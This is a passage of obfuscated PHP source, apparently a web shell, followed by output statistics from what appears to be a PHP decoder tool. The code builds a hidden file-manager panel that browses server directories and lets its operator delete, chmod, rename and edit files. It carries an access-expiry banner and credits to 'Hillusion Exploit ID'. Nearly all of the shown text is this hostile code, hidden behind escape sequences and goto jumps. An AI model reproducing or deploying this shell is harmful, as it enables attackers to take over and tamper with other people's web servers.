x65\156\x74\145\162\x22\76\xa\x3c\164\x72\x20\x63\x6c\141\x73\163\x3d\42\x66\151\162\x73\x74\x22\76\12\74\x74\x64\x3e\x3c\x63\145\156\164\x65\162\x3e\x4e\x61\x6d\145\74\57\143\x65\156\164\x65\x72\x3e\74\x2f\x74\x64\76\12\74\164\x64\x3e\x3c\x63\x65\x6e\164\145\162\76\123\151\x69\172\x65\x46\x69\x6c\x65\74\57\143\145\156\164\x65\x72\x3e\74\x2f\164\144\x3e\12\74\164\x64\x3e\74\x63\145\156\164\145\x72\x3e\x50\162\x6d\151\x73\156\74\57\x63\x65\156\x74\145\162\76\x3c\x2f\x74\144\x3e\xa\x3c\x74\144\x3e\74\143\x65\156\x74\x65\162\x3e\x4d\x6f\144\151\x66\171\x3c\x2f\143\x65\x6e\x74\145\x72\76\74\x2f\164\x64\x3e\xa\74\x2f\164\x72\x3e"; foreach ($scandir as $dir) { if (!is_dir($path . "\57" . $dir) || $dir == "\x2e" || $dir == "\x2e\x2e") { continue; } echo "\74\164\162\76\x3c\164\x64\x3e\x3c\x69\155\147\x20\x73\x72\143\x3d\x22\150\x74\164\x70\x73\x3a\x2f\x2f\143\144\156\x34\x2e\151\143\x6f\156\x66\151\x6e\144\145\162\56\x63\x6f\x6d\x2f\x64\141\164\x61\x2f\151\x63\x6f\156\163\57\x73\x69\x6d\x70\154\x65\x2d\163\157\146\x74\x2f\65\61\62\x2f\x66\157\154\144\x65\x72\55\x32\65\66\56\x70\156\x67\x22\40\x77\151\144\164\x68\75\x22\x36\x25\x22\76\x20\x3c\x61\40\x68\x72\x65\x66\x3d\x22\x3f\160\x61\164\150\x3d" . $path . "\57" . $dir . "\x22\76" . $dir . "\74\57\141\x3e\74\57\164\x64\x3e\12\74\x74\144\76\74\x63\x65\x6e\x74\x65\162\x3e\55\74\x2f\143\145\156\164\x65\162\x3e\x3c\57\164\x64\76\xa\74\164\144\76\x3c\x63\x65\x6e\164\145\162\x3e\74\x66\157\156\x74\x20\x73\x69\172\145\75\42\61\x22\76"; if (is_writable($path . "\57" . $dir)) { echo "\74\146\x6f\156\x74\x20\143\157\154\157\162\x3d\42\154\x69\x6d\145\x22\x3e"; } elseif (!is_readable($path . "\x2f" . $dir)) { echo "\74\146\x6f\156\164\x20\143\x6f\x6c\157\x72\x3d\x22\162\x65\x64\x22\76"; } echo perms($path . "\x2f" . $dir); if (is_writable($path . "\x2f" . $dir) || !is_readable($path . "\x2f" . $dir)) { echo "\74\57\x66\157\156\164\x3e"; } echo "\x3c\57\143\145\156\x74\x65\162\x3e\74\57\146\x6f\x6e\164\x3e\x3c\57\164\x64\x3e\x3c\x74\x64\x3e\12\12\xa\xa\74\x63\145\x6e\x74\145\x72\76\74\x66\157\x72\155\x20\155\x65\164\150\157\144\x3d\x22\x50\117\x53\124\42\x20\x61\143\x74\151\x6f\156\75\x22\x3f\x6f\160\164\151\x6f\156\x26\x70\141\x74\150\x3d" . $path . "\42\76\xa\74\x73\x65\154\145\x63\164\x20\143\x6c\141\x73\163\x3d\42\x6b\141\156\x22\x20\163\164\x79\154\145\x3d\x22\x77\x69\144\x74\x68\72\40\64\60\x25\x3b\42\x20\x6e\x61\x6d\x65\75\x22\157\x70\x74\x22\x3e\12\x3c\x6f\x70\x74\x69\157\x6e\40\166\141\154\165\145\x3d\42\x22\x3e\x23\74\x2f\x6f\x70\164\x69\x6f\156\76\12\x3c\x6f\x70\164\x69\x6f\x6e\40\166\x61\154\x75\145\x3d\x22\x64\145\154\x65\x74\x65\x22\76\x44\x65\154\x65\x74\145\74\x2f\x6f\160\164\x69\157\x6e\x3e\12\74\157\x70\164\151\x6f\156\40\166\141\x6c\x75\x65\x3d\42\x63\150\155\157\144\x22\76\x43\x68\x6d\157\144\x3c\57\157\x70\164\x69\157\x6e\x3e\xa\x3c\x6f\160\x74\151\x6f\156\x20\x76\141\x6c\165\x65\x3d\42\x72\145\x6e\141\155\145\x22\76\x52\145\x6e\x61\155\x65\x3c\x2f\157\160\164\x69\x6f\156\x3e\xa\74\x2f\x73\145\154\x65\x63\164\76\12\xa\x3c\x69\x6e\x70\165\x74\40\x74\x79\x70\145\x3d\x22\x68\x69\x64\x64\145\x6e\x22\40\156\141\155\145\75\42\x74\x79\x70\145\42\x20\x76\141\154\165\145\75\42\144\x69\162\x22\x3e\12\74\151\x6e\x70\165\164\x20\164\x79\x70\145\75\42\x68\151\144\144\145\156\42\40\156\x61\x6d\x65\x3d\42\156\141\155\x65\x22\x20\x76\141\x6c\165\x65\x3d\x22" . $dir . "\42\76\xa\x3c\x69\156\160\x75\x74\x20\164\171\x70\145\x3d\42\x68\x69\x64\x64\145\156\x22\x20\x6e\141\155\145\75\x22\160\141\x74\150\x22\x20\166\141\154\x75\x65\x3d\42" . $path . "\57" . $dir . "\x22\76\12\74\x69\156\x70\x75\x74\40\x63\154\x61\163\163\x3d\42\153\141\x6e\x22\40\164\x79\x70\145\75\x22\x73\x75\142\x6d\151\x74\42\40\166\x61\154\x75\x65\x3d\42\x3e\42\x3e\12\x3c\x2f\146\157\162\x6d\76\74\x2f\x63\145\156\x74\x65\x72\x3e\74\57\164\x64\76\xa\74\57\x74\162\x3e"; } echo "\x3c\164\162\x20\143\154\141\163\x73\x3d\x22\x66\x69\x72\163\x74\42\76\74\x74\x64\76\x3c\x2f\x74\144\x3e\74\x74\144\x3e\x3c\x2f\x74\144\x3e\74\164\144\76\x3c\57\164\x64\x3e\x3c\164\144\76\74\x2f\164\x64\x3e\74\57\164\x72\76"; foreach ($scandir as $file) { if (!is_file($path . "\57" . $file)) { continue; } $size = filesize($path . "\57" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\x4d\x42"; } else { $size = $size . "\x20\113\x42"; } echo "\x3c\164\x72\x3e\74\x74\x64\76\12\74\151\x6d\x67\40\163\x72\143\75\42\150\x74\x74\160\163\x3a\x2f\57\x63\x64\156\x33\x2e\151\x63\157\156\x66\151\x6e\x64\x65\x72\56\143\157\x6d\x2f\x64\141\164\x61\57\151\143\157\x6e\163\x2f\144\x61\164\x61\x62\x61\163\145\x73\x2f\x35\x31\62\x2f\x63\157\160\x79\55\62\65\x36\x2e\x70\156\x67\x22\40\167\x69\x64\x74\x68\x3d\x22\66\x25\42\x3e\12\x3c\41\55\55\x3c\146\157\x6e\164\40\x73\x69\172\x65\x3d\x22\63\42\x3e\55\x2d\x3e\xa\40\x3c\x61\40\x68\162\x65\x66\75\x22\x3f\x66\151\x6c\x65\x73\x72\143\x3d" . $path . "\57" . $file . "\46\x70\x61\164\x68\x3d" . $path . "\x22\x3e" . $file . "\74\57\x61\x3e\12\12\74\x21\x2d\55\x3c\x2f\146\157\156\x74\76\55\x2d\x3e\74\57\x74\144\x3e\74\164\x64\x3e\x3c\143\x65\x6e\164\x65\162\76\xa\12\x3c\146\x6f\x6e\x74\x20\x73\x69\x7a\145\75\x22\x31\x22\76" . $size . "\x3c\57\x66\157\156\164\x3e\74\57\x63\x65\156\164\145\162\76\74\57\x74\144\76\xa\74\x74\x64\x3e\x3c\x63\x65\156\x74\x65\x72\76\x3c\x66\157\156\x74\40\163\151\x7a\145\75\x22\61\42\x3e"; if (is_writable($path . "\57" . $file)) { echo "\x3c\146\157\x6e\164\x20\x63\x6f\154\157\162\x3d\42\x6c\x69\155\145\x22\76"; } elseif (!is_readable($path . "\x2f" . $file)) { echo "\74\146\157\156\164\x20\143\157\154\157\162\x3d\42\162\x65\x64\x22\76"; } echo perms($path . "\x2f" . $file); if (is_writable($path . "\57" . $file) || !is_readable($path . "\57" . $file)) { echo "\74\x2f\x66\157\x6e\x74\x3e"; } echo "\74\57\143\145\156\x74\145\162\x3e\x3c\x2f\146\x6f\x6e\x74\x3e\74\57\x74\x64\x3e\74\x74\144\76\x3c\x63\x65\x6e\164\145\x72\x3e\12\xa\xa\xa\74\x66\x6f\162\155\40\155\x65\x74\150\157\144\x3d\x22\120\117\x53\124\x22\x20\141\143\164\x69\x6f\x6e\75\x22\x3f\x6f\x70\164\151\x6f\x6e\x26\x70\x61\164\150\75" . $path . "\x22\76\xa\74\x73\145\154\145\143\164\40\x63\154\x61\x73\163\75\42\x6b\x61\x6e\x22\40\163\x74\171\x6c\145\x3d\x22\167\151\x64\x74\x68\x3a\40\x34\x30\45\x3b\42\x20\156\141\x6d\x65\x3d\42\157\x70\164\42\76\12\x3c\157\160\x74\x69\x6f\x6e\x20\x76\141\154\x75\x65\x3d\42\x22\76\43\74\57\157\x70\164\151\157\156\x3e\xa\74\x6f\160\164\151\157\x6e\40\x76\x61\x6c\165\x65\75\x22\144\x65\x6c\x65\x74\x65\x22\76\x44\x65\x6c\145\x74\x65\74\x2f\157\x70\164\151\x6f\x6e\76\xa\74\x6f\x70\164\151\157\x6e\40\x76\141\154\165\x65\x3d\42\x63\150\x6d\157\144\x22\76\103\150\x6d\x6f\x64\74\57\157\160\164\151\x6f\x6e\x3e\xa\74\x6f\160\164\x69\x6f\x6e\40\x76\141\x6c\165\x65\x3d\x22\x72\145\x6e\x61\155\145\x22\76\122\145\156\141\155\x65\x3c\x2f\157\160\164\151\x6f\156\x3e\12\x3c\x6f\160\164\151\157\x6e\x20\x76\x61\154\x75\145\75\42\x65\x64\151\x74\42\x3e\105\144\x69\164\74\x2f\x6f\x70\x74\x69\x6f\x6e\76\12\x3c\x2f\x73\145\154\145\x63\x74\76\12\xa\x3c\x69\156\x70\x75\x74\x20\164\x79\160\145\x3d\42\150\151\144\x64\x65\x6e\42\x20\156\141\155\145\x3d\x22\164\171\160\145\42\x20\x76\141\154\165\145\75\42\146\151\x6c\x65\x22\76\xa\x3c\151\x6e\x70\165\x74\x20\164\171\160\x65\x3d\x22\x68\x69\144\144\x65\156\42\x20\156\141\x6d\x65\x3d\x22\156\141\155\145\42\40\x76\141\x6c\165\x65\75\x22" . $file . "\42\x3e\12\74\151\x6e\x70\x75\164\40\x74\171\x70\x65\x3d\x22\x68\x69\144\x64\145\x6e\42\x20\x6e\141\155\x65\75\42\x70\x61\x74\x68\42\40\x76\141\x6c\x75\x65\x3d\x22" . $path . "\57" . $file . "\42\x3e\12\x3c\151\156\160\x75\164\40\143\154\141\x73\163\x3d\42\153\141\x6e\x22\40\x74\x79\x70\x65\75\42\163\x75\x62\155\151\164\42\x20\x76\141\x6c\x75\x65\75\x22\76\x22\x3e\12\x3c\x2f\x66\157\x72\155\76\x3c\57\x63\x65\156\164\x65\162\76\x3c\x2f\x74\144\x3e\xa\74\x2f\x74\162\76"; } echo "\74\x2f\164\141\142\x6c\x65\x3e\74\x2f\x64\x69\x76\76"; } echo "\x3c\x62\162\x2f\76\74\x63\145\x6e\x74\x65\162\x3e\x3c\x74\x61\142\x6c\145\40\x62\157\x72\x64\145\x72\x63\157\x6c\157\162\75\x22\x6c\151\155\145\42\40\x73\x74\x79\154\145\x3d\42\x62\x6f\x72\x64\x65\x72\x2d\x72\x61\144\x69\x75\163\x3a\x34\160\x78\x3b\x77\151\x64\x74\150\x3a\x39\x32\45\x3b\42\x20\x61\x6c\x69\x67\x6e\x3d\42\x63\x65\156\x74\145\162\42\x3e\x3c\164\x64\76\xa\12\x3c\142\76\74\x63\145\156\x74\145\x72\76\74\141\40\x68\162\145\x66\x3d\42\x3f\145\x78\151\164\42\76\103\x6f\160\x79\162\x69\147\x68\164\74\57\141\x3e\40\46\143\157\x70\x79\x3b\40" . date("\131") . "\x20\x2d\40\x3c\141\x20\x68\x72\x65\x66\75\42\x6d\141\x69\154\x74\157\72\164\145\x78\67\165\162\145\x40\x67\x6d\141\x69\154\56\143\x6f\155\x22\x3e\x3c\146\x6f\x6e\164\x20\143\157\154\157\162\75\x22\154\x69\155\x65\x22\76\x54\x65\x78\67\165\x72\x65\74\x2f\141\76\x3c\57\146\157\x6e\164\76\x20\174\40\74\x61\40\150\x72\x65\x66\75\42\150\x74\164\160\x73\x3a\57\57\167\167\x77\x2e\x67\157\x6f\147\x6c\x65\56\x63\x6f\x6d\x2f\x73\145\141\162\143\150\77\x71\x3d\151\156\164\x65\170\164\72\110\x69\154\x6c\165\x73\x69\x6f\156\x20\105\170\x70\154\157\151\164\40\x49\x44\42\x20\x74\x61\x72\147\145\164\75\42\137\142\154\x61\x6e\x6b\42\x3e\74\146\157\x6e\x74\x20\x66\141\143\145\x3d\x22\116\x65\167\40\122\157\x63\x6b\x65\162\42\40\x73\x69\x7a\145\x3d\42\62\x22\x3e\x48\151\x6c\x6c\165\x73\151\157\156\x20\x45\170\160\154\x6f\x69\x74\40\x49\x44\74\x2f\x61\76\x3c\57\146\157\156\x74\76\12\74\57\x63\x65\156\x74\x65\x72\76\74\x2f\x66\x6f\x6e\x74\76\74\57\164\x61\142\154\145\x3c\x2f\x62\76\74\57\143\145\156\164\x65\162\x3e\12\xa\x3c\57\x62\x6f\144\171\x3e\xa\x3c\x2f\x68\164\155\x6c\x3e"; } else { echo "\74\x68\x74\x6d\154\76\74\x68\145\x61\144\x3e\xa\74\155\145\164\x61\x20\x6e\141\155\145\x3d\47\166\151\145\167\160\157\x72\164\x27\x20\143\x6f\x6e\164\145\x6e\164\75\x27\167\x69\x64\164\150\75\144\x65\x76\151\x63\x65\x2d\167\x69\144\x74\x68\x2c\x20\151\156\x69\x74\151\141\154\x2d\x73\143\141\154\x65\75\x31\x2e\60\x2c\x20\155\x61\x78\151\x6d\x75\x6d\x2d\x73\x63\x61\x6c\x65\x3d\61\x2e\60\54\x20\x75\163\x65\162\x2d\x73\143\x61\154\141\x62\x6c\145\75\x6e\x6f\47\x3e\74\x2f\150\x65\141\x64\76\12\74\x73\x74\x79\154\145\x3e\xa\x62\157\x64\171\x20\173\xa\x20\x20\x20\x20\x62\x61\143\153\147\x72\x6f\165\x6e\x64\x3a\40\142\x6c\x61\143\153\73\12\40\40\x20\x20\146\x6f\x6e\x74\55\x66\x61\155\151\x6c\171\72\40\151\143\145\154\141\156\x64\73\12\40\x20\x20\x20\143\157\154\x6f\162\x3a\x20\167\x68\x69\x74\x65\73\12\x20\x20\40\40\175\74\57\163\164\x79\x6c\x65\x3e\12\74\x63\x65\156\x74\x65\x72\x3e\x20\74\x66\x6f\x6e\x74\x20\x63\x6f\x6c\157\x72\75\x6c\x69\x6d\x65\x3e\74\x62\76\133\41\x5d\x20\x57\141\162\156\151\156\x67\40\133\x21\x5d\74\x2f\x62\76\x3c\142\x72\x3e"; date_default_timezone_set("\101\163\x69\141\57\112\x61\x6b\141\162\x74\141"); $anj = date("\131\55\x6d\55\x64"); echo "\x3c\x74\x61\x62\x6c\x65\40\x62\157\x72\x64\145\x72\x3d\x22\61\42\40\142\x6f\162\144\145\x72\143\x6f\x6c\157\x72\x3d\42\x6c\x69\155\x65\x22\x20\x61\154\151\x67\156\x3d\42\x63\145\156\164\145\x72\42\76\xa\74\164\162\x3e\74\x74\x64\x3e"; echo "\xa\x3c\x66\157\x6e\164\40\x63\x6f\x6c\x6f\x72\x3d\x77\150\x69\x74\x65\76\x59\157\x75\x72\x20\x41\143\x63\145\163\x73\x20\x45\x78\160\x69\x72\x65\144\x3c\164\x64\76\74\146\157\x6e\x74\x20\x63\157\x6c\157\162\75\167\150\x69\164\x65\76\x44\x61\164\x65\x2e\x20\111\x6e\40\72\x20\74\x66\157\x6e\x74\x20\143\157\154\x6f\x72\75\x6c\151\x6d\x65\76\x3c\x62\76{$anj}\x20\x3c\57\x62\x3e\x3c\x2f\164\x64\76\x3c\57\x74\162\x3e\x3c\164\x72\76\74\x74\x64\x3e\x3c\146\157\156\164\x20\143\x6f\x6c\x6f\162\75\x77\150\151\x74\145\x3e\122\145\147\x69\x73\x74\40\x3a\x20\74\x66\x6f\x6e\164\x20\143\x6f\154\157\162\75\x6c\x69\x6d\145\x3e\74\x62\76{$awal}\x3c\57\x62\x3e\x3c\x74\144\x3e\74\146\x6f\x6e\164\40\x63\157\154\157\162\x3d\167\x68\x69\x74\145\76\105\170\x70\151\x72\x65\144\x20\72\40\x3c\146\x6f\x6e\164\x20\x63\157\154\x6f\x72\75\x6c\151\155\145\76\x3c\x62\76{$expired}\x20\x3c\x2f\142\76\x3c\x2f\164\144\x3e\74\57\x74\x61\142\154\x65\76\x3c\x2f\143\145\156\164\x65\x72\x3e"; } goto Uogfg; BozPb: $expired = date("\x32\x30\x32\x34\x2d\x30\x31\x2d\62\61"); goto QZTPI; eDE58: error_reporting(0); goto VUOHb; Qvgw3: ZeahE: goto cFKiU; og3XE: l20Ep: goto wZ_nc; KyeiS: MAZ_m: goto pmRhb; Uogfg: goto MAZ_m; goto dd2X3; b7dfR: goto ZeahE; goto IR4it; bq_a0: goto dMZLI; goto efDM6; QZTPI: goto e3g6Z; goto Qvgw3; Scy9A: $awal = date("\62\60\x32\x33\55\61\x32\55\62\x31"); goto maD4I; QyLNF: goto l20Ep; goto qKjNm; cFKiU: 

Function Calls

None

Variables

None

Stats

MD5 4ec527f6ce8cb35bb9e776b31737a2e3
Eval Count 0
Decode Time 85 ms